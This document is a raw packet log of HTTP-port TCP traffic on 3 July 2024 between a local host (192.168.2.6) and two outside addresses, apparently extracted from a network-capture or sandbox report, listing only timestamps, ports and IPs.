Jul 3, 2024 18:08:41.156804085 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156821012 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156836987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156851053 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156868935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156877995 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156913042 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156919956 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.156958103 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.156970024 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157002926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157020092 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.157037973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157046080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.157071114 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157078028 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.157104015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157110929 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.157136917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157147884 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.157171011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157181978 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.157203913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157217026 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.157237053 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157249928 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.157270908 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157283068 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.157305002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157315016 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.157337904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157347918 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.157371998 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157382965 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.157406092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157409906 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.157438993 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157449961 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.157473087 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157486916 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.157505035 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157520056 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.157538891 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157552958 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.157571077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157582998 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.157604933 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157639027 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.157645941 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.157685995 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.791322947 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.791363955 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:41.797066927 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:41.797082901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:42.560412884 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:42.560506105 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:42.650165081 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:42.655052900 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:42.828495026 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:42.828515053 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:42.828528881 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:42.828588963 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:42.828630924 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:42.831020117 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:42.835875034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:43.009812117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:43.010036945 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:43.028281927 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:43.033389091 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:43.859468937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:43.859548092 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:43.886789083 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:43.891649961 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:44.764170885 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:44.764250994 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:44.768997908 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:44.773916960 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:44.774010897 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:44.791882992 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:44.796684980 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.487421036 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.487445116 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.487453938 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.487466097 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.487477064 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.487508059 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.487520933 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.487530947 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.487621069 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.487632036 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.487644911 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.487644911 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.487704039 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.487704039 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.492685080 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.492696047 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.492707968 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.492758036 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.492795944 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.493422985 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.493474960 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.613054037 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.613094091 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.613106012 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.613117933 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.613130093 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.613172054 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.613172054 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.613253117 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.613290071 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.613322020 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.613334894 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.613358974 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.613373041 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.613430023 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.613440990 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.613465071 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.613483906 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.614259958 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.614293098 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.614304066 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.614315987 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.614331007 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.614347935 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.614517927 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.614558935 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.614929914 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.614940882 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.614953995 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.614969969 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.614988089 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.614993095 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.615005970 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.615025043 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.615048885 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.615789890 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.615817070 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.615828037 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.615838051 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.615849972 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.615861893 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.615906000 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.615916967 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.615942001 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.615958929 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.616681099 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.616724968 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.618068933 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.618120909 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.739847898 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.739876986 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.739967108 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.740005016 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.740056992 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.740111113 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.740145922 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.740158081 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.740174055 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.740185976 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.740189075 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.740206003 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.740217924 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.740226984 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.740250111 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.740284920 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.740323067 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.740381002 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.740391970 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.740402937 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.740422010 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.740444899 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.740585089 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.740596056 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.740606070 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.740633011 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.740654945 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.740770102 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.740812063 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.740813971 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.740825891 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.740854979 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.740916967 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.740928888 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.740961075 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.741218090 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.741257906 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.741269112 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.741280079 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.741306067 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.741372108 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.741383076 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.741393089 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.741406918 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.741414070 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.741430044 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.741451979 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.741573095 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.741585016 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.741595984 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.741606951 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.741617918 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.741624117 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.741630077 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.741651058 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.741667986 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.742213011 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.742224932 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.742235899 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.742263079 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.742275953 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.742286921 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.742295027 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.742296934 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.742311001 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.742312908 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.742352009 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.742366076 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.742377996 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.742413998 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.742610931 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.742647886 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.742659092 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.742666006 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.742686987 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.742767096 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.742778063 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.742788076 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.742799044 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.742810011 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.742831945 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.744898081 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.744945049 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.744968891 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.745004892 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.864864111 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.864888906 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.864900112 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.864912033 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.864929914 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.864940882 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.864959002 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.864990950 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.865039110 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865051985 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865076065 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865082026 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.865087032 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865103006 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.865128994 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.865150928 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865163088 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865174055 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865187883 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.865205050 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.865251064 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865262985 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865292072 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.865350962 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865364075 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865375996 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865386963 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.865390062 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865398884 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865405083 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.865432978 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.865479946 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865490913 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865502119 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865515947 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.865535975 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.865555048 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865590096 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.865624905 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865636110 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865645885 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865678072 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.865698099 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.865782022 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865792990 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865819931 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.865823984 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865834951 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865840912 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865849972 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.865860939 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.865884066 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.865987062 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.865998030 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866014004 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866024971 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866036892 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.866038084 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866050005 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866080046 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.866090059 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.866184950 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866194963 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866219044 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.866240978 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866252899 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866255999 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.866271019 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.866281033 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.866384983 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866398096 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866409063 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866420031 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866422892 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.866431952 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866441965 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.866472006 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.866533995 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866544962 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866571903 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.866718054 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866729021 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866739988 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866750956 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866756916 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.866763115 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866774082 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866784096 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866791964 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.866796017 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866815090 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.866828918 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.866986036 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.866997004 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.867007971 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.867018938 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.867026091 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:45.867038965 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:45.867046118 CEST	62915	80	192.168.2.6	77.91.77.81
